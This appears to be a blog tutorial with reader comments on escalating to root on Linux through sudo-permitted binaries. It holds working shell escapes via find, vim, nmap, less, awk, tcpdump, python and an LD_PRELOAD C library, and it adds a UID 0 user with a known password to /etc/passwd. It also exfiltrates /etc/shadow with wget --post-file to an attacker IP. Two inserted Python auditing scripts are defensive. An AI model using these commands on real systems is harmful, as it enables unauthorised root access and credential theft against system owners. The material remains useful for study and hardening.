If you have a limited shell that can run some programs through the sudo command, you might be able to escalate your privileges. Here I show some of the binaries that help you escalate privileges using the sudo command. But before the privilege escalation, let's understand some sudoers file syntax and what the sudo command is ;).
Index
- What is SUDO?
- Sudoer File Syntax.
- Exploiting SUDO user
- /usr/bin/find
- /usr/bin/nano
- /usr/bin/vim
- /usr/bin/man
- /usr/bin/awk
- /usr/bin/less
- /usr/bin/nmap (--interactive and --script methods)
- /bin/more
- /usr/bin/wget
- /usr/sbin/apache2
What is SUDO?
The SUDO (Substitute User and Do) command allows an administrator to delegate privileges to users, with the activity logged. In other words, users can execute commands as root (or as other users) using their own password instead of root's, or with no password at all, depending on the sudoers settings. The rules that govern the decision to grant access are found in the /etc/sudoers file.
Sudoer File Syntax.
root ALL=(ALL) ALL
Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
The first part is the user, the second is the terminal (host) from which the user can use the sudo command, the third part is which users he may act as, and the last one is which commands he may run when using sudo.
touhid ALL= /sbin/poweroff
Explain 2: The above rule lets the user touhid run the poweroff command from any terminal, authenticating with touhid's own password.
touhid ALL = (root) NOPASSWD: /usr/bin/find
Explain 3: The above rule lets the user touhid run the find command as the root user from any terminal without a password.
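To make the field layout concrete, here is an added example (not code from the original post) that parses user-specification lines in the format explained above and flags entries that grant a non-root principal one of the binaries this article lists, with or without NOPASSWD. The sample sudoers text is constructed from the rules quoted on this page plus the apt-get/apt-cache rules asked about in the comments; the tag list is a subset of what sudoers supports, and Defaults and alias lines are skipped rather than modelled.

```python
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Binaries this article lists as escalation paths when permitted through sudo.
# Only names that appear on the page are included; extend the set for your estate.
SHELL_ESCAPE_BINARIES = {
    "find", "nano", "vim", "man", "awk", "less", "nmap", "more", "wget", "apache2",
}

# Tags sudoers allows in front of a command (subset of the manual's list).
TAG_WORDS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV"}

# user_or_%group  hosts = (runas_user[:runas_group]) [TAG:] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+"              # user name or %group
    r"(?P<hosts>[^=\s]+)\s*=\s*"     # host list, then '=' (spaces around it allowed)
    r"(?:\((?P<runas>[^)]*)\)\s*)?"  # optional (runas) part
    r"(?P<rest>.+)$"                 # tags and comma-separated command list
)


@dataclass
class SudoRule:
    who: str
    hosts: str
    runas: str
    tags: Set[str]
    commands: List[str]


def parse_rule(line: str) -> Optional[SudoRule]:
    """Parse one user-specification line. Returns None for blank, comment,
    Defaults and alias lines, which this parser does not model."""
    line = line.strip()
    if not line or line.startswith("#") or line.split()[0] in (
        "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias"
    ):
        return None
    m = RULE_RE.match(line)
    if m is None:
        raise ValueError(f"unrecognised sudoers rule: {line!r}")
    tags: Set[str] = set()
    commands: List[str] = []
    for spec in m.group("rest").split(","):
        tokens = spec.split()
        # A TAG: applies to this and all following commands in the list;
        # for auditing purposes we simply collect the tags per rule.
        while tokens and tokens[0].endswith(":") and tokens[0][:-1] in TAG_WORDS:
            tags.add(tokens.pop(0)[:-1])
        if tokens:
            commands.append(" ".join(tokens))
    runas = m.group("runas")
    # With no (runas) list, sudo runs the command as root.
    runas_user = runas.split(":")[0].strip() if runas else "root"
    return SudoRule(m.group("who"), m.group("hosts"), runas_user, tags, commands)


def audit_rule(rule: SudoRule) -> List[str]:
    """Flag rules that let a non-root principal reach root via a listed binary."""
    findings: List[str] = []
    if rule.who == "root" or rule.runas not in ("root", "ALL"):
        return findings
    auth = "without a password" if "NOPASSWD" in rule.tags else "with their own password"
    for cmd in rule.commands:
        if cmd == "ALL":
            findings.append(f"{rule.who}: may run ALL commands as {rule.runas} {auth}")
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append(
                f"{rule.who}: {cmd} as {rule.runas} {auth}; "
                f"{binary} is on this article's list of binaries that escape to a shell or read/write files"
            )
    return findings


def audit_sudoers(text: str) -> List[str]:
    """Run audit_rule over every parsable line of a sudoers file."""
    findings: List[str] = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is not None:
            findings.extend(audit_rule(rule))
    return findings


# Constructed sample built from the rules quoted in this article (plus the apt
# rules from the comments); not taken from any real system.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL) ALL
touhid  ALL= /sbin/poweroff
touhid  ALL = (root) NOPASSWD: /usr/bin/find
touhid  ALL = (root) NOPASSWD: /usr/bin/apt-get, /usr/bin/apt-cache
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Only the find rule is reported for the sample: poweroff and the apt tools are not on the page's list, and the root rule is skipped because root already has everything. A real audit would also resolve Cmnd_Alias entries and included files, which this example leaves out.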
Exploiting SUDO Users.
To exploit a sudo user you first need to find out which commands you are allowed to run.
sudo -l
The above command lists the commands the current user is allowed to run.
Here sudo -l shows that the user may run all of these binaries as the root user without a password.
Let's take a look at each binary one by one (only those mentioned in the index) and escalate privileges to the root user.
Using Find Command
sudo find /etc/passwd -exec /bin/sh \;
or
sudo find /bin -name nano -exec /bin/sh \;
Using Vim Command
sudo vim -c '!sh'
Using Nmap Command
Old way.
sudo nmap --interactive
nmap> !sh
sh-4.1#
Note: the nmap --interactive option is not available in the latest nmap versions.
Latest way, without --interactive:
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
Using Man Command
sudo man man
then type !sh and press Enter
Using Less/More Command
sudo less /etc/hosts
sudo more /etc/hosts
then type !sh and press Enter
Using awk Command
sudo awk 'BEGIN {system("/bin/sh")}'
Using nano Command
nano is a text editor; using it you can modify the passwd file and add a user with root privileges, after which you switch to that user. Add the following line to /etc/passwd in order to add the user with root privileges.
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
sudo nano /etc/passwd
Now switch user; the password is: test
su touhid
Using wget Command
This is a very cool way, which requires a web server to download a file. I have never seen this way anywhere else. Let's explain it.
On the attacker side:
- First copy the target's /etc/passwd file to the attacker machine.
- Modify the file saved in the previous step on the attacker machine and add a user to it.
- Append only this line => touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
- Host that passwd file using any web server.
On the victim side:
sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
Now switch user; the password is: test
su touhid
Note: if you want to exfiltrate a file from the server, such as root's SSH key or the shadow file:
sudo wget --post-file=/etc/shadow 192.168.56.1:8080
Set up a listener on the attacker machine: nc -lvp 8080
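Both the nano method and the wget method above end with the same artefact: an /etc/passwd line that carries its own hash and UID 0. The following is an added example (not part of the original post) of the checks a defender or a file-integrity job would run over /etc/passwd to catch exactly that: UID 0 accounts other than root, password hashes stored in passwd instead of shadow, duplicate user names, and, for the whole-file overwrite that wget performs, lines that are not in a known-good copy. The sample files are constructed for this example and the hash is an obvious placeholder, not a real credential.

```python
from typing import Dict, List, NamedTuple


class PasswdEntry(NamedTuple):
    line: int
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Split /etc/passwd into its seven colon-separated fields, one entry per line."""
    entries: List[PasswdEntry] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(lineno, name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text: str) -> List[str]:
    """Report the conditions that the passwd modifications in this article produce."""
    findings: List[str] = []
    first_seen: Dict[str, int] = {}
    for e in parse_passwd(text):
        if e.uid == 0 and e.name != "root":
            findings.append(f"line {e.line}: '{e.name}' has UID 0 (root-equivalent account)")
        if e.passwd == "":
            findings.append(f"line {e.line}: '{e.name}' has an empty password field (no password required)")
        elif e.passwd not in ("x", "*") and not e.passwd.startswith("!"):
            # 'x' means the hash lives in /etc/shadow; '*' and '!...' are locked accounts.
            findings.append(
                f"line {e.line}: '{e.name}' carries a password hash in /etc/passwd "
                f"rather than /etc/shadow; su and login will authenticate against it"
            )
        if e.name in first_seen:
            findings.append(
                f"line {e.line}: duplicate entry for '{e.name}' (first at line {first_seen[e.name]})"
            )
        else:
            first_seen[e.name] = e.line
    return findings


def added_entries(baseline: str, current: str) -> List[str]:
    """Lines present in the current file but absent from a known-good copy.
    This is the comparison that catches a whole-file replacement, which the
    per-entry checks alone would miss if the attacker's copy were otherwise clean."""
    known = set(baseline.splitlines())
    return [line for line in current.splitlines() if line.strip() and line not in known]


# Constructed samples: BASELINE_PASSWD is a clean file, TAMPERED_PASSWD has the
# article's appended line with the hash replaced by a placeholder.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
touhid:x:1000:1000:touhid:/home/touhid:/bin/bash
"""
TAMPERED_PASSWD = BASELINE_PASSWD + "touhid:$6$PLACEHOLDER$NOTAREALHASH:0:0:root:/root:/bin/bash\n"

if __name__ == "__main__":
    for finding in audit_passwd(TAMPERED_PASSWD):
        print(finding)
    for line in added_entries(BASELINE_PASSWD, TAMPERED_PASSWD):
        print("not in baseline:", line)
```

The duplicate-name check is also why the "su: Unknown id" result reported in the comments is plausible on non-Linux systems: two entries for one name are resolved differently by different NSS implementations, so the appended line is not a reliable signal on its own; the UID 0 and hash-in-passwd checks are.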
Using apache Command
Sadly you can't get a shell and can't edit system files,
but using this you can view system files.
sudo apache2 -f /etc/shadow
The output looks like this:
Syntax error on line 1 of /etc/shadow: Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
Sadly no shell, but you manage to extract root's hash; now crack the hash on your machine. For shadow cracking, click here for more.
I posted some; if you know any other, please comment and share the knowledge with others. Happy Hacking.
sudo mount -o bind /bin/bash /bin/mount
sudo mount
Thanks for sharing with us. 🙂
for extracting files
nc -lvp 80 > server_passwd
wget 127.0.0.1 --post-file /etc/passwd
Thanks for the kind post. Could I post on my blog after translating into my language, Korean?
Pleasure mate. You can POST on your Blog but you give the credit to the original author(me) on a post.
Hi, nice list.
You add tcpdump in there to exec commands as root.
$ echo $'id\ncat /etc/shadow' > /tmp/.test
$ chmod +x /tmp/.test
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
Source:
https://www.stevencampbell.info/2016/04/why-sudo-tcpdump-is-dangerous/
thanks. 🙂
sudo strace -o/dev/null /bin/bash
:)..cool..
Great and extensive guide (y)
thanks mate.. 🙂
anyone way to prevent all of these but still allowing sudoer to su to root if they know the root password?
If you know root's password you don't need the sudo group… you can get root's privileges using "su - root" or "su root" and just type root's password. But on some systems like Solaris your current user must be an authorized user to run the su command.
I understand. I didn't explain myself better hehe. I have Default rootpw in the sudoers file, which only allows the sudoer to su to root if I know the root password. So any command the sudoer runs will require root's password, in case the sudoer is compromised. I thought that your methods are able to bypass this but I just tried all of them and you can't.
Really cool list Touhid!
thank you @Danners.
@Andrew just restrict everything in the sudoers file and put only this line there:
%su ALL=(root) /bin/su
Then add your reliable users to the “su” group and get a root shell with “sudo su” and password.
Thanks, but I don’t think that’s what I want. Your method allows sudoer to su to root with just sudoer’s password. “Default rootpw” requires root password, and all privilege escalation mentioned here do not work.
Exploit sudoer with /usr/bin/pip install *
check https://github.com/0x00-0x00/FakePip
sudo python -c 'import pty; pty.spawn("/bin/bash")'
Or, for that matter, any language like ruby or perl which can run a shell.
That was awesomely explained!
Thanks man.. your words boost me to write more posts. I hope you'll like my next posts also.
Very helpful! Thanks for posting
su: Unknown id: touhid
could you please explain how the “sudo less /etc/hosts” and then “!sh” works? How and why is it working?
Why are you confused, mate???
I’m using your method under wget, followed it exactly as you say, but I’m getting “unknown ID” when trying to switch user?
This method works on Linux systems.. if you are doing it on something other than Linux, like Solaris, this method does not work like this.
What is special about Solaris? How can I get it to work on Solaris?
I was wondering if it’s there any way to abuse of sudo if the entries are related to apt actions, for example :
touhid ALL = (root) NOPASSWD: /usr/bin/apt-get
touhid ALL = (root) NOPASSWD: /usr/bin/apt-cache
I've been checking a few test cases and it seems not to work, since you abuse sudo just because the cmd tools have execution modes.
Thanks in advance,
H.
maybe this list is useful for you
https://gtfobins.github.io/
🙂
TH3xACE/SUDO_KILLER from github is a nice tool to automate the above described scenarios and much more
Cool Brother…Great Work
Regarding apache2, you can use the following C code (e.g. preload.c):
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
and then run it like so:
gcc -fPIC -shared -o /tmp/x.so preload.c -nostartfiles
sudo LD_PRELOAD=/tmp/x.so apache2
You’ll get shell.